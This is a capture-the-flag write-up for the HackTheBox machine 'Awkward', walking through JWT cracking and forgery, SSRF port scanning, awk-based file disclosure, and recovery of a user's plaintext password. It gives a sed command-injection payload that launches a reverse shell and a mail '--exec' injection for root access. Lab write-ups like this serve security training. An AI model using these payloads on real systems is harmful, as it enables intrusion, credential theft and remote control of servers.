Awkward

Intro

In this article I’m going to be tackling Awkward machine, a medium difficulty Linux machine on hackthebox.com.

in this machine we will be preseneted with vue js files loaded with the page where we will search for routes and exploit a jwt malformed token to bypass authentication and get access to the hr dashboard, exploit ssrf to leak internal server resources where we will find an api documentation on port 3002, using this api we will exploit awk to get a command injection and extract a user's ssh credentials to gain initial foothold and from there exploit a sed command to get command injection and pivot to the www-data user which have access to a file that we will abuse through the mail command to get root privileges

Information Gathering

as always starting by doing nmap

we see in the nmap scan output that only 2 ports are open ssh on port 22 and http on port 80 which is running nginx server let's take a look at the website running on port 80

it redirects us to http://hat-valley.htb so lets add this to the /etc/hosts file so we can access this website

Now you can be able to access the website

using wappalyzer we can see that it's a nodejs application running on ubuntu's nginx server

if we navigate the website we can see that an online store is under building so let's fuzz the website for subdomains that may lead us to find the online store website

Subdomain FUZZING Using ffuf

-mc all => match all codes

now let's filter by size and remove all responses with 132 size

we have found the subdomain store.hat-valley.htb, let's add it to the /etc/hosts file so we can view the website

the subdomain wants us to login

the application uses php since the application runs normally with the /index.php

Directory Enumeration

enumerating directories on the root of the website

enumerating directories on the store subdomain

seems that enemerating directories doesn't bring somthing of value so let's try enemerating the website frontend files if we inspect the page we will find a bunch of files let's dig and find out if we are going to find something of interest

this is a vue application (vue is javascript frontend framework)

let's test out those routes, we can notice that the /leave and /dashboard routes are redirecting us to /hr route so login in is mendatory to acces the other routes

let's look for other vue files maybe we can find other routes if we look at the directory called services we have 4 js files let's dig into these files and extract any useful informations so in all those files we get those routes :Cancel changes

/api/all-leave returns jwt malformed

/api/submit-leave

/api/login

/api/staff-details returns jwt malformed

/api/store-status

since It throws the error of JWT token Malformed I think it is a token error so let's pass this without token intercept the request using burp and we can see a token with guest value let's remove and send the request we get invalid user

doing the same but with the /api/staff-details and we get a list of users data

exfiltrating data from the /api/staff-details route in a nice format using curl and jq

so we have passwords that are hashed using some algorithm we're going to use this website to know the type of the hashes https://hashes.com/en/tools/hash_identifier and looking at the result we can see that the hash is SHA256

or use the hash-identifier command on linux

now let's crack the hashes first thing to do before using hashcat or john the ripper let's use crackstation

now let's login using those credentials in the /hr route that we have found previously

let's intercept this using burp suite

%22http:%2F%2Fstore.hat-valley.htb%22 => url decode : "http://store.hat-valley.htb"

Server Side Request Forgery SSRF leak internal resources

using ffuf to FUZZ all possible ports

we are escaping the " because ffuf removes them if we didn't escape them

-fs 0 => filtering by size and removing empty responses

let's take a look at the internal port 3002

let's open it in the browser and take a deeper look and this the internal api documentation of all the routes we found previously

/api/login route is not vulnerable

Abusing Awk to get local file inclusion

i will show u how can this syntax awk '\{user}\' /var/www/private/leave_request.csv get u File Disclosure Vunerability

so if we find a way to poison the user value (token username) we could get a File Disclosure Vulnerabilty

Poisoning The User Token

copy the user token value from the storage -> Cookies -> http://hat-valley.htb so if we find a way to poison the user value (token username) we could get a file disclosure vulnerabilty

and then navigate to the jwt.io website to decode the token

in order to poison the token we need to make sure that the signature is valid and to do that we need to crack the JWT token

Cracking the JWT

cracking the JWT using hashcat

and now our token have a verified signature

Python Exploit to poison the token and get local file disclosure vulnerability

so we can notice that PWD=/var/www/hat-valley.htb and since the application is a nodejs application there must be a package.json file so let's leak this file

now we know the path to the server.js file let's leak this file

discolsing nginx configuration file for the store subdomain (nginx configuration files always stored in /etc/nginx/sites-available/*.conf) what this does is if the store subdomain is directed to /cart or /product-details return 403 (forbidden) end with .php require a password which exist in /etc/nginx/conf.d/.htpasswd

let's identify the hash type using hash-identifier

now let's crack it using hashcat, but it couldn't crack it

let's move on and look for the users that exectutes /bin/bash

let's take a look at the .bashrc file of the user bean (i couldn't discolse the same file for other users) analyzing the file we can notice an alias that backups the user bean's backup and this seems interesting

let's take a look at the backup_home bash script

let's extract the bean_backup_final.tar.gz from the victim machine, and to do that we need to modify the python script and read the content of the compressed backup as bytes and save it to a file so we can decompress it without errors

now let's run the python script and extract the compressed GZIP data

extracting the gzip using tar, and we have the user's bean backup home

let's see if there is any hidden directories

Discovering bean's credentials in his xpad directory, change directory to .config/xpad and read the content-DS1ZS1 file which contains some bean's credentials

let's try to ssh using those credentials, and we are in cool

User Flag

we have found our first flag

let's try if the password we have found in the .config/xpad 014mrbeanrules!#P may be the password for the store the username is admin and the password may be 014mrbeanrules!#P

and we are in

now let's move to the directory where the store file are existed

after reading the code in the files i found 3 dangerous system calls in the cart_actions.php file where we may get command execution but if we look at the code we will find that there is blacklist on the special characters so it's not possible to get a command execution from the first 2 system calls but the last one using sed we may exploit it

let's understand how sed can be exploited to inject commands here we have replaced the first line with the command id

so we can inject in the {$item_id} field

let's see where is the add item in the code

now let's go to the shop in the store web application (store.hat-valley.htb) and add some item to the cart and intercept this request using burp

now we will modify the item parameter and the action parameter where the user will be used to inject the commands and action will be delete_item so sed will be called and if we execute this we sleep for 3 seconds

generate a reverse shell script and put it in the tmp directory

start listener

add_item first and then delete_item with item is 1/d'+-e+"1e+/tmp/reverseshell.sh"+' to execute the reverse shell

Upgrading Simple Shells to Fully Interactive TTYs

listing processes

and this looks interesting it looks like its monitoring the leave_requests.csv file

let's take a look at the leave_requests.csv file

let's use PSPY to monitor linux processes without root privileges, you can download it from this github repository https://github.com/DominicBreuker/pspy and then transfer it to the www-data session so we can use it there

when we update the leave_request.csv file it invokes a new process called mail which runs with root privileges and based on what we get from the pspy we can see the mail command format that runs in the notify.sh script so the schema of the mail command could be this mail -s "Leave Request: " $name christine

to exploit the mail command go to gtfobins and search for mail to see how mail can be abused to execute scripts echo 'bean --exec="\!/tmp/reverseshell.sh"' >> leave_requests.csv before you execute this make sure you have set up a listener to catch the reverse shell